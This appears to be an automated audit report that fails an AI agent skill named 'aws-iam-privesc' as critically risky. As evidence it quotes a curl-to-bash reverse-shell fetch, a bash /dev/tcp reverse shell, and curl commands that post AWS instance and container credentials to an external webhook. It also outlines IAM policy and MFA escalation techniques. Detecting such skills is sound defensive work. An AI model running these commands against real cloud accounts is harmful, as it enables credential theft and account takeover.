aws-iam-privesc
Fail
Audited by Gen Agent Trust Hub on May 4, 2026
Risk Level: CRITICALREMOTE_CODE_EXECUTIONDATA_EXFILTRATIONCOMMAND_EXECUTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill provides multiple methods for executing remote code and establishing reverse shells on AWS compute resources.
- Evidence in
references/compute-privesc.md: Explicitly instructs the use ofcurl https://reverse-shell.sh/<attacker_host>:<port> | bashto execute remote payloads. - Evidence in
references/compute-privesc.md: Demonstrates RCE via environment variable injection (PYTHONWARNINGS+BROWSER) in Lambda functions to spawn a reverse shell. - Evidence in
references/compute-privesc.md: Usesbash -i >& /dev/tcp/<host>/<port> 0>&1for interactive command shells. - [DATA_EXFILTRATION]: The skill documents techniques to harvest and exfiltrate sensitive cloud credentials to external servers.
- Evidence in
SKILL.md: Commands are provided to post security credentials from the Instance Metadata Service (IMDS) to an external<webhook>usingcurl. - Evidence in
references/compute-privesc.md: Provides an ECS-specific pattern to exfiltrateAWS_CONTAINER_CREDENTIALS_RELATIVE_URIcontents to an external URL. - Evidence in
references/compute-privesc.md: Includes a Python Lambda script that explicitly reads/proc/self/environto steal and return session tokens. - [COMMAND_EXECUTION]: The skill utilizes the AWS CLI for unauthorized privilege escalation and policy manipulation.
- Evidence in
SKILL.md: Provides commands to useiam:CreatePolicyVersionwith the--set-as-defaultflag to grant*/*permissions. - Evidence in
references/iam-sts-privesc.md: Details methods for disabling or taking over MFA devices and modifying trust relationships to assume high-privilege roles.
Recommendations
- AI detected serious security threats
Audit Metadata